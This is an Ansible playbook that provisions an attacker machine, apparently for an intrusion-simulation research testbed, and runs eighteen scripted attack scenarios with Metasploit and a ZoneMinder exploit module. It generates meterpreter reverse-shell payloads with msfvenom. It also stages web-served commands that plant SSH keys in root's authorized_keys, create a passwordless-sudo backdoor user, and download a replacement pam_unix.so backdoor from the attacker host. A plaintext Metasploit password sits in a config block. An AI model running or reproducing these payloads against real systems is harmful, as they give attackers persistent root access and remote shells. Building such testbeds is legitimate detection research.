- name: Install Attacker Host
  hosts: attacker
  become: true
  vars:
    attacker_user: aecid
    attacker_ip: 192.42.1.174
  handlers:
    - name: restart msfrpcd
      ansible.builtin.service:
        name: msfrpcd
        state: restarted
  tasks:
    - name: get user home directory
      ansible.builtin.shell: >
             getent passwd {{ attacker_user }}  | awk -F: '{ print $6 }'
      changed_when: false
      register: user_home
      tags:
        - metasploit
        - zoneminder
        - exploit
        - config
        - install
        - git
        - penpal
        - playbooks

    - name: Create shellcode for port 3333
      ansible.builtin.shell: >
             msfvenom -p cmd/unix/python/meterpreter/reverse_tcp LHOST=192.42.1.174 LPORT=3333 --platform x64
      changed_when: false
      register: shellcode3333
      tags:
        - metasploit
        - zoneminder
        - exploit
        - config
        - install
        - git
        - penpal
        - playbooks

    - name: create private ssh key for attacker
      community.crypto.openssh_keypair:
          path: "{{user_home.stdout}}/.ssh/attacker_key"
          owner: "{{ attacker_user }}"
          group: "{{ attacker_user }}"
      register: sshkey
      tags:
          - playbooks

    - name: Create file with add-key-to-root-authorize-command
      ansible.builtin.copy:
              content: |
                "\"echo {{sshkey.public_key}} >> /root/.ssh/authorized_keys\""
              dest: "/var/www/html/README.txt"
              owner: "root"
              mode: "0755"
      tags:
          - scenario_1_a_a
          - scenario_1_b_a
          - playbooks

    - name: Create file with add-key-to-root-authorize-command for pipe
      ansible.builtin.copy:
              content: |
                "echo \"{{sshkey.public_key}}\" >> /root/.ssh/authorized_keys"
              dest: "/var/www/html/README.txt.1"
              owner: "root"
              mode: "0755"
      tags:
          - scenario_1_e_a
          - scenario_1_c_a

    - name: Create file for creating a backdoor user
      ansible.builtin.copy:
              content: |
                "\"useradd -s /bin/bash -m webadmin; mkdir -p /home/webadmin/.ssh; chown webadmin.webadmin -R /home/webadmin; echo {{sshkey.public_key}} >> /home/webadmin/.ssh/authorized_keys; echo 'webadmin ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers.d/webadmin\""
              dest: "/var/www/html/README.txt.2"
              owner: "root"
              mode: "0755"
      tags:
          - playbooks

    - name: Create file for creating a backdoor user(alternate)
      ansible.builtin.copy:
              content: |
                "/usr/sbin/useradd -s /bin/bash -m webadmin; mkdir -p /home/webadmin/.ssh; chown webadmin.webadmin -R /home/webadmin; echo {{sshkey.public_key}} >> /home/webadmin/.ssh/authorized_keys; echo 'webadmin ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers.d/webadmin"
              dest: "/var/www/html/README.txt.3"
              owner: "root"
              mode: "0755"
      tags:
          - playbooks

    - name: Create file for a libpam backdoor
      ansible.builtin.copy:
              content: |
                      "\"wget http://{{attacker_ip}}/pam_unix.so; mv pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so\""
              dest: "/var/www/html/README.txt.4"
              owner: "root"
              mode: "0755"
      tags:
          - playbooks

    - name: Create file for a libpam backdoor(alternate)
      ansible.builtin.copy:
              content: |
                      "wget http://{{attacker_ip}}/pam_unix.so; mv pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so"
              dest: "/var/www/html/README.txt.5"
              owner: "root"
              mode: "0755"
      tags:
          - playbooks

    - name: Create file with add-key-to-root-authorize-command
      ansible.builtin.shell:
              cmd: msfvenom -p cmd/unix/python/meterpreter/reverse_tcp LHOST=192.42.1.174 --platform x64 > /var/www/html/TODO.md
              creates: /var/www/html/TODO.md
      tags:
          - playbooks
          - scenario_1_e_a
          - scenario_1_c_a


    - name: Prepare and Install Metasploit-Exploit
      block:
        - name: Prepare local Metasploit-Path
          ansible.builtin.file:
              path: "{{user_home.stdout}}/.msf4/modules/exploits/unix/webapp"
              state: directory
              recurse: yes
              owner: "{{attacker_user}}"
              group: "{{attacker_user}}"
        
        - name: Upload Zoneminder-Exploit
          ansible.builtin.copy:
              src: zoneminder_snapshots.rb
              dest: "{{user_home.stdout}}/.msf4/modules/exploits/unix/webapp/zoneminder_snapshots.rb"
              owner: "{{attacker_user}}"
              group: "{{attacker_user}}"
              mode: '0644'
          notify: restart msfrpcd
      tags:
         - metasploit
         - zoneminder
         - exploit
         - config
         - install
         - playbooks

    - debug:
         msg: "{{sshkey}}"
    - name: Prepare and Install PenPal
      block:
        - name: Install Python3-venv
          ansible.builtin.apt:
              name: python3-virtualenv
           #    - name: Git checkout
           #      become: true
           #      become_user: {{ attacker_user }}
           #      ansible.builtin.git:
           #        repo: 'git@github.com:ait-aecid/hackhelfer.git'
           #        dest: "{{user_home.stdout}}/penpal"
           #        accept_hostkey: True
        - name: Install PenPal-Module
          ansible.builtin.pip:
              name: "file://{{user_home.stdout}}/penpal"
              virtualenv: "{{user_home.stdout}}/penpal/venv"
        - name: Copy PenPal-Config
          ansible.builtin.copy:
              content: |
                      ###
                      sliver_config:
                        config_file: /home/aecid/.sliver-client/configs/aecid_localhost.cfg

                      msf_config:
                        password: hackerman
                        server: localhost
              dest: "{{user_home.stdout}}/penpal/.penpal.yml"
              owner: "{{attacker_user }}"
        - name: Copy PenPal-Wrapper
          become: True
          become_user: "{{attacker_user}}"
          ansible.builtin.template:
              src: wrapper.sh.j2
              dest: "{{user_home.stdout}}/penpal/wrapper.sh"
              mode: '0755'
        - name: Copy playbooks
          become: True
          become_user: "{{attacker_user}}"
          ansible.builtin.template:
              src: "{{ item }}.j2"
              dest: "{{user_home.stdout}}/penpal/{{ item }}.yml"
              mode: '0755'
          loop:
              - scenario_1_a_a
              - scenario_1_b_a
              - scenario_1_f_a
              - scenario_1_e_a
              - scenario_1_c_a
              - scenario_1_d_a
              - scenario_1_a_b
              - scenario_1_b_b
              - scenario_1_c_b
              - scenario_1_d_b
              - scenario_1_e_b
              - scenario_1_f_b
              - scenario_1_a_c
              - scenario_1_b_c
              - scenario_1_c_c
              - scenario_1_d_c
              - scenario_1_e_c
              - scenario_1_f_c
      tags:
         - metasploit
         - penpal
         - exploit
         - config
         - install
         - playbooks

    - name: "Run Scenario 1 a a"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_a_a.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_a_a
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 b a"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_b_a.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_b_a
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 f a"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_f_a.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_f_a
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 e a"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_e_a.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_e_a
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 c a"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_c_a.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_c_a
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 d a"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_d_a.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_d_a
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 a b"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_a_b.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_a_b
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 b b"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_b_b.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_b_b
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 c b"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_c_b.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_c_b
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 d b"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_d_b.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_d_b
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 e b"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_e_b.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_e_b
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 f b"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_f_b.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_f_b
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 a c"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_a_c.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_a_c
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 b c"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_b_c.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_b_c
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 c c"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_c_c.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_c_c
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 d c"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_d_c.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_d_c
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 e c"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_e_c.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_e_c
         - metasploit
         - penpal
         - exploit

    - name: "Run Scenario 1 f c"
      become: True
      become_user: "{{attacker_user}}"
      ansible.builtin.shell:
          cmd: "{{user_home.stdout}}/penpal/wrapper.sh scenario_1_f_c.yml"
          chdir: "{{user_home.stdout}}/penpal"
      tags:
         - scenario_1_f_c
         - metasploit
         - penpal
         - exploit

